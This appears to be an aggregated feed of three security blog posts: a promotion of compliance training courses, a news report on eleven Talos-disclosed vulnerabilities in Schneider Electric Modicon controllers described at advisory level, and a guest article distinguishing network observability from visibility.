Cyber security is a broad industry, so you need to decide which area suits you best. To help you make that choice, here are some of our most popular training courses:

Knowledge of ISO 27001, the international standard for information security, is an absolute must for anyone who handles sensitive data. We offer several ISO 27001 courses, including an introduction to the Standard and guidance on specific roles, such as internal auditor and lead implementer.

ISO 22301 is the international standard for business continuity. Organisations that follow its framework can be sure that they’ll continue operating when disaster strikes.

Our Foundation-level course covers the essentials of the Standard, but we also offer advanced courses for those that want to lead an implementation project or audit.

Any organisation that transmits, processes or stores payment card data must comply with the PCI DSS. Our training courses help you understand the basics of the Standard, implement its requirements and complete the SAQ (self-assessment questionnaire).

The GDPR is the most significant update to information security law in more than twenty years. Anyone who handles personal data or is responsible for data protection needs to comply with its requirements.

Regular staff should familiarise themselves with the Regulation via our Foundation-level course; senior staff would benefit from our Practitioner course; and those looking to fulfil the DPO role should enrol on our Certified DPO training course.


A version of this blog was originally published on 31 October 2018.

The post 3 reasons cyber security training is essential appeared first on IT Governance Blog.

Talos experts found 11 flaws in Schneider Electric Modicon Controllers

Cisco Talos experts discovered nearly a dozen flaws affecting some of the models of Schneider Electric’s Modicon programmable logic controllers.

Talos experts discovered 11 security flaws affecting some models of Schneider Electric’s Modicon programmable logic controllers.

Affected models are Modicon M580, M340, BMENOC 0311, BMENOC 0321, Quantum, Premium, and Modicon BMxCRA and 140CRA.

The only model affected by all of the vulnerabilities is the M580 PLC. The flaws affect the implementations of the Modbus, FTP and TFTP protocols, and the REST API. Schneider Electric published four advisories to address the vulnerabilities.

The vulnerabilities are tracked as CVE-2019-6841 through CVE-2019-6851; an attacker could exploit them by sending specially crafted requests to the affected devices.

The vulnerability in the TFTP protocol, tracked as CVE-2019-6851, is a File and Directory Information Exposure issue that could cause the disclosure of information from the controller when using this protocol.

The REST API is affected by three vulnerabilities: CVE-2019-6848, CVE-2019-6849 and CVE-2019-6850.

CVE-2019-6848 is an uncaught exception issue that could be exploited to cause a Denial of Service condition by sending specific data on the REST API of the controller/communication module.

CVE-2019-6849 is an Information Exposure vulnerability that could cause the disclosure of sensitive information when using specific Modbus services provided by the REST API of the controller/communication module.

CVE-2019-6850 is another Information Exposure vulnerability that could cause the disclosure of sensitive information when reading specific registers with the REST API of the controller/communication module.

Most of the vulnerabilities in the FTP protocol (CVE-2019-6841, CVE-2019-6842, CVE-2019-6843, CVE-2019-6844, CVE-2019-6846, CVE-2019-6847) could be exploited to cause a DoS condition.

Talos researchers reported the vulnerabilities to Schneider Electric in May and July. The company’s advisories provide a series of recommendations for preventing exploitation of the issues. The Talos blog post also includes Snort rules to detect exploitation attempts.

Pierluigi Paganini

(SecurityAffairs – Schneider Electric Modicon, hacking)

The post Talos experts found 11 flaws in Schneider Electric Modicon Controllers appeared first on Security Affairs.

Network Security Observability & Visibility: Why they are not the same

Guest article by Sean Everson, Chief Technology Officer at Certes Networks

In today’s increasingly complex cyber landscape, it is now more important than ever for organisations to be able to analyse contextual data in order to make informed decisions regarding their network security policy. This is not possible without network observability. Organisations can now see inside the whole network architecture to explore problems as they happen. Observability is a property of the network system and should not be confused with visibility which provides limited metrics for troubleshooting.

With observability, organisations can make the whole state of the network observable and those limitations no longer exist. Observability provides the contextual data operators need to analyse and gain new and deeper insights into the network. This enables teams to proactively make more informed decisions to improve network performance and to strengthen their overall security posture because context is now available to troubleshoot incidents and make policy changes in real-time.

Unfortunately, observability is often miscommunicated and misunderstood, as visibility is repackaged by some vendors and sold as observability, when the two are not the same. Visibility and monitoring have an important role to play, but observability is different. Visibility and the metrics it provides limit troubleshooting, whereas observability provides rich contextual data for gaining deeper insights and understanding based on the raw data collected from the network or system.

With research showing that the average lifecycle of a data breach is 279 days, it is clear that organisations are only slowly putting observability into practice and adopting ‘observability as a culture’. In the case of some well-known breaches, however, the timescales were much longer than that. In the Marriott International breach, which was discovered in November 2018, hackers had freely accessed the network since 2014. During this time, no unusual activity was detected and no alerts about the hackers’ access were raised.

Additionally, in the British Airways data breach in 2018, data was compromised over a two-week period, affecting 500,000 customers. This resulted in the Information Commissioner's Office (ICO) announcing that it intended to fine British Airways £183.39M for infringements of the General Data Protection Regulation (GDPR).

These two examples alone demonstrate how essential it is for organisations to begin to value the ability to understand their systems and behaviour by making their network observable.

Understanding Observability
Simply defined, observability is a measure of how well something is working internally, inferred from what can be observed externally. Observability means building applications on the assumption that someone is going to observe them, with the aim of strengthening security and informing system access decisions. The right combination of contextual data can be used to gain a deeper understanding of network policy deployment and of every application that tries to communicate across the network. With an observability capability, attackers will therefore have a hard time attempting lateral ‘east-west’ movement or remaining hidden in the data centre or across the WAN. In turn, observability can provide a global view of the network environment and visual proof that the security strategy is effective and working.

Unfortunately, it’s not uncommon for infiltrations to go undetected in networks for days, weeks or months. The longer an infiltration goes undetected, the more vulnerable the network and its systems become. To detect infiltrations effectively, all roles need to see inside the entire architecture. And, when this capability is built in, it is observability that enables greater insight into the overall reliability, impact and success of systems, their workload and their behaviour.

Conclusion
Research shows that companies that are able to detect and contain a breach in less than 200 days spend £1 million less on the total cost of a breach. That’s a figure no organisation can - or should - ignore. Organisations need a cyber security solution that can be measured and traced. Observability provides the contextual data so that organisations can take measurable steps towards controlling system access across the network environment. With this type of observable analysis, organisations can gain deeper insights into how to enhance their security policy and detect unwanted access as it occurs.



Sean Everson, Certes Networks CTO